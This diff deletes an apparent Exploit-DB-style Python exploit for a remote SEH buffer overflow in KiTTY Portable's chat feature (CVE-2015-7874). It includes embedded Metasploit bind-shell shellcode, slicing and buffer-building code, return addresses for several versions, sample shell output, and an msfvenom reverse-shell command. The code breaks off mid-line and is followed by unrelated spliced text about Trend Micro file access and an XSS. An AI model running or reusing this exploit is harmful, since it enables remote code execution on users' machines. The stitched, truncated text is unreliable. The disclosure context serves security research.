@@ -1,341 +0,0 @@ -# Exploit Title: KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10) -# Date: 28/12/2015 -# Exploit Author: Guillaume Kaddouch -# Twitter: @gkweb76 -# Blog: http://networkfilter.blogspot.com -# GitHub: https://github.com/gkweb76/exploits -# Vendor Homepage: http://www.9bis.net/kitty/ -# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe -# Version: 0.65.0.2p -# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 10 Pro x64 builds 10240/10586 (FR) -# CVE: CVE-2015-7874 -# Category: Remote - -""" -Disclosure Timeline: --------------------- -2015-09-13: Vulnerability discovered -2015-09-26: Vendor contacted -2015-09-28: Vendor answer -2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability -2015-12-28: exploit published - -Other KiTTY versions have been released since 0.65.0.3p, not related to this vulnerability. Vendor said he may release a version without chat in a future release, -while providing an external chat DLL as a separate download. - -Description : -------------- -A remote overflow exists in the KiTTY Chat feature, which enables a remote attacker to execute code on the -vulnerable system with the rights of the current user, from Windows XP x86 to Windows 10 x64 included (builds 10240/10586). -Chat feature is not enabled by default. - -WinXP -> Remote Code Execution -Win7 -> Remote Code Execution -Win10 -> Remote Code Execution - -Instructions: -------------- -- Enable Chat feature in KiTTY portable (add "Chat=1" in kitty.ini) -- Start KiTTY on 127.0.0.1 port 1987 (Telnet) -- Run exploit from remote machine (Kali Linux is fine) - -Exploitation: -------------- -When sending a long string to the KiTTY chat server as nickname, a crash occurs. 
The EIP overwrite does let little room -for exploitation (offset 54) with no more than 160 to 196 bytes for the shellcode from XP to Windows10. Using a Metasploit -small shellcode such as windows/shell/reverse_ord_tcp (118 bytes encoded) makes KiTTY crashing after the first connection. -We control the SEH overflow, but as all DLLs are SafeSEH protected, using an address from KiTTY itself has a NULL which -forces us to jump backward with no extra space. We are jailed in a tight environment with little room to work with. - -The trick here is to slice our wanted Metasploit bind shellcode in 3 parts (350 bytes total), and send them in 3 -successive buffers, each of them waiting in an infinite loop to not crash the process. Each buffer payload will copy -its shellcode slice to a stable memory location which has enough room to place a bigger shellcode. The final buffer -jumps to that destination memory location where our whole shellcode has been merged, to then proceed with decoding -and execution. This exploit is generic, which means you can even swap the shellcode included with a 850 bytes one, -and it will be sliced in as many buffers as necessary. This method should theoretically be usable for other -exploits and vulnerabilities as well. - -All KiTTY versions prior to 0.65.0.2p should be vulnerable, the only change is the SEH address for the POP POP RET. -I have successfully exploited prior versions 0.63.2.2p and 0.62.1.2p using SEH addresses I have included as comment in the exploit. - -Pro & Cons: ------------ -[+]: works from XP to Windows 10 as it uses addresses from the main executable -[+]: not affected by system DEP/ASLR/SafeSEH as the main executable is not protected -[+]: works even with small slice size below 50 bytes, instead of 118 -[-]: each buffer sent consumes 100% of one CPU core. Sending many buffers can reach 100% of whole CPU depending on the -CPU's core number. 
However even on a single core CPU, it is possible to send 9 buffers and run a shellcode successfully. -Also, for a bind shell payload, the connection is kept open even when closing the main program. -[-]: the destination memory address is derived from address of ECX at time of crash. To reuse this slice method on another -vulnerability, it may be required to use another register, or even to use addresses available on stack instead at time of crash. - -Graphical explanation: ---------------------- - -------------------- -------------------- ----- SHELLCODE ---- -------------------- -------------------- - -1) Shellcode Slicer -> slice[1] - -> slice[2] - -> slice[3] - -2) Buffer Builder -> buffer[1]: junk + padding + slice[1] + endmark + shell_copy + nseh + seh - -> buffer[2]: junk + padding + slice[2] + endmark + shell_copy + nseh + seh - -> buffer[3]: junk + padding + slice[3] + endmark + shell_copy + nseh + seh - - TARGET CRASH AREA TARGET DST ADDR - ----------------------- shell_copy -------------- -3) Slice Launcher -> Sends buffer[1] ------------------------>| buffer[1] (thread1) | -----> | slice[1] | <-| - -> Sends buffer[2] ------------------------>| buffer[2] (thread2) | -----> | slice[2] | | - -> Sends buffer[3] ------------------------>| buffer[3] (thread3) | -----> | slice[3] | | - ----------------------- -------------- | - | | - |____________________________________| - jump to rebuilt shellcode - -guillaume@kali64:~$ ./kitty_chat.py 10.0.0.52 win10 - -KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10) -[*] Connecting to 10.0.0.52 -[*] Sending evil buffer1... (slice 1/3) -[*] Sending evil buffer2... (slice 2/3) -[*] Sending evil buffer3... (slice 3/3) - -[*] Connecting to our shell... -(UNKNOWN) [10.0.0.52] 4444 (?) open -Microsoft Windows [version 10.0.10240] -(c) 2015 Microsoft Corporation. Tous droits reserves. 
-
-C:\kitty\App\KiTTY>
-
-"""
-
-import socket, os, time, sys, struct
-
-print "\nKiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)"
-
-if len(sys.argv) < 3:
- print "\nUsage: kitty_chat.py [no_nc|local_nc]"
- print "Example: kitty_chat.py 192.168.135.130 win7"
- print "\n Optional argument:"
- print "- 'no_nc' (no netcat), prevents the exploit from starting netcat."
- print "Useful if you are using your own shellcode."
- print "- 'local_nc (local netcat), binds netcat on local port 4444."
- print "Useful if you are using a classic reverse shell shellcode."
- sys.exit()
-
-host = sys.argv[1] # Remote target
-win = sys.argv[2] # OS
-
-# If argument "no_nc" specified, do not start netcat at the end of the exploit
-# If argument "local_nc" specified, bind netcat to local port 4444
-# By default netcat will connect to remote host on port 4444 (default shellcode is a bind shell)
-netcat = "remote"
-if len(sys.argv) == 4:
- if sys.argv[3] == "no_nc":
- netcat = "disabled"
- elif sys.argv[3] == "local_nc":
- netcat = "local"
- else:
- print "Unknown argument: %s" % sys.argv[3]
- sys.exit()
-
-# Destination address, will be used to calculate dst addr copy from ECX + 0x0006EEC6
-relative_jump = 0x112910E8 # = 0x0006EEC6 + 0x11222222 ; avoid NULLs
-slice_size = 118
-
-# OS buffer alignement
-# buffer length written to memory at time of crash
-if win == "win7":
- offset = 180
-elif win == "win10":
- offset = 196
-elif win == "winxp":
- offset = 160
- slice_size = 98 # buffer smaller on XP, slice size must be reduced
-else:
- print "Unknown OS selected: %s" % win
- print "Please choose 'winxp', 'win7' or 'win10'"
- sys.exit()
-
-# Shellcode choice: below is a Metasploit bind shell of 350 bytes. However I have tested successfully
-# a Metasploit meterpreter reverse RC4 shell of 850 bytes (encoded with x86/alpha_mixed) on Windows XP where the buffer
-# is the smallest.
The shellcode was cut into 9 slices and worked perfectly :-) The same works of course -# for Windows 7 and Windows 10, where I tested successfully a Metasploit HTTPS reverse shell of 1178 bytes -# (encoded with x86/alpha_mixed), which was cut into 10 slices. To generate such shellcode: -# msfvenom -p windows/meterpreter/reverse_https LHOST=YOUR_ATTACKER_IP LPORT=4444 -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' -f c - -# Metasploit Bind Shell 4444 -# Encoder: x86/fnstenv_mov -# Bad chars: '\x00\x0a\x0d\xff' -# Size: 350 bytes -shellcode = ( -"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e\xf9" -"\xa7\x68\x83\xeb\xfc\xe2\xf4\xf2\x11\x25\x68\x0e\xf9\xc7\xe1" -"\xeb\xc8\x67\x0c\x85\xa9\x97\xe3\x5c\xf5\x2c\x3a\x1a\x72\xd5" -"\x40\x01\x4e\xed\x4e\x3f\x06\x0b\x54\x6f\x85\xa5\x44\x2e\x38" -"\x68\x65\x0f\x3e\x45\x9a\x5c\xae\x2c\x3a\x1e\x72\xed\x54\x85" -"\xb5\xb6\x10\xed\xb1\xa6\xb9\x5f\x72\xfe\x48\x0f\x2a\x2c\x21" -"\x16\x1a\x9d\x21\x85\xcd\x2c\x69\xd8\xc8\x58\xc4\xcf\x36\xaa" -"\x69\xc9\xc1\x47\x1d\xf8\xfa\xda\x90\x35\x84\x83\x1d\xea\xa1" -"\x2c\x30\x2a\xf8\x74\x0e\x85\xf5\xec\xe3\x56\xe5\xa6\xbb\x85" -"\xfd\x2c\x69\xde\x70\xe3\x4c\x2a\xa2\xfc\x09\x57\xa3\xf6\x97" -"\xee\xa6\xf8\x32\x85\xeb\x4c\xe5\x53\x91\x94\x5a\x0e\xf9\xcf" -"\x1f\x7d\xcb\xf8\x3c\x66\xb5\xd0\x4e\x09\x06\x72\xd0\x9e\xf8" -"\xa7\x68\x27\x3d\xf3\x38\x66\xd0\x27\x03\x0e\x06\x72\x02\x06" -"\xa0\xf7\x8a\xf3\xb9\xf7\x28\x5e\x91\x4d\x67\xd1\x19\x58\xbd" -"\x99\x91\xa5\x68\x1f\xa5\x2e\x8e\x64\xe9\xf1\x3f\x66\x3b\x7c" -"\x5f\x69\x06\x72\x3f\x66\x4e\x4e\x50\xf1\x06\x72\x3f\x66\x8d" -"\x4b\x53\xef\x06\x72\x3f\x99\x91\xd2\x06\x43\x98\x58\xbd\x66" -"\x9a\xca\x0c\x0e\x70\x44\x3f\x59\xae\x96\x9e\x64\xeb\xfe\x3e" -"\xec\x04\xc1\xaf\x4a\xdd\x9b\x69\x0f\x74\xe3\x4c\x1e\x3f\xa7" -"\x2c\x5a\xa9\xf1\x3e\x58\xbf\xf1\x26\x58\xaf\xf4\x3e\x66\x80" -"\x6b\x57\x88\x06\x72\xe1\xee\xb7\xf1\x2e\xf1\xc9\xcf\x60\x89" -"\xe4\xc7\x97\xdb\x42\x57\xdd\xac\xaf\xcf\xce\x9b\x44\x3a\x97" 
-"\xdb\xc5\xa1\x14\x04\x79\x5c\x88\x7b\xfc\x1c\x2f\x1d\x8b\xc8" -"\x02\x0e\xaa\x58\xbd" -) -# ############################################################################### -# ** Shellcode Slicer ** -# ############################################################################### -# Slice our shellcode in as many parts as necessary -count = 1 -position = 0 -remaining = len(shellcode) -slice = [] -total_size = 0 - -counter = 0 -while position < len(shellcode): - if remaining > (slice_size - 1): - slice.append(shellcode[position:slice_size*count]) - position = slice_size * count - remaining = len(shellcode) - position - count += 1 - else: # last slice - slice.append(shellcode[position:position+remaining] + '\x90' * (slice_size - remaining)) - position = len(shellcode) - remaining = 0 - - # If shellcode size is less than 256 bytes (\xFF), two slices only are required. However the jump - # to shellcode being on 2 bytes, it would insert a NULL (e.g \xFE\x00). In this case we simply - # add a NOP slice to keep this shellcode slicer generic. - if len(shellcode) < 256: - slice.append('\x90' * slice_size) - total_size += slice_size - - # Keep track of whole slices size, which may be greater than original shellcode size - # if padding is needed for the last slice. 
Will be used to calculate a jump size later - total_size += len(slice[counter]) - - -# ############################################################################### -# ** Buffer Builder ** -# ############################################################################### -# Prepare as many buffers as we have shellcode slices -seh = '\x36\x31\x4B\x00' # 0x004B3136 / POP POP RET / kitty_portable.exe 0.65.0.2p -#seh = '\x43\x82\x4B\x00' # 0x004B8243 / POP POP RET / kitty_portable.exe 0.63.2.2p -#seh = '\x0B\x34\x49\x00' # 0x0049340B / POP POP RET / kitty_portable.exe 0.62.1.2p -nseh = '\x90' * 4 # will be calculated later -junk = '\x41' * 58 -endmark = '\x43' * 5 # used to mark end of slice -buffer = [] - -for index in range(len(slice)): - # Slice end marker, to stop copy once reached # mov edi,0x4343XXXX - shellcode_end = '\xBF' + slice[index][slice_size-2:slice_size] + '\x43\x43' - - shell_copy = ( # 51 bytes - # Calculate shellcode src & dst address - '\x8B\x5C\x24\x08' # mov ebx,[esp+8] ; retrieve nseh address - ) - - if index < (len(slice) - 1): - # sub bl,0xB2 ; calculate shellcode position from nseh - shell_copy += '\x80\xEB' + struct.pack(" 0: # add esi,0x1117FED7 (+118 * x) - shell_copy += '\x81\xC6' + struct.pack("hello + +By combining these two issues, you can remotely access files as SYSTEM on a Trend Micro machine. + +I happened to notice another problem, the file loader.html has an obvious XSS if the window is 10px wide. I know that's an odd condition, but an attacker can easily force that with something like + +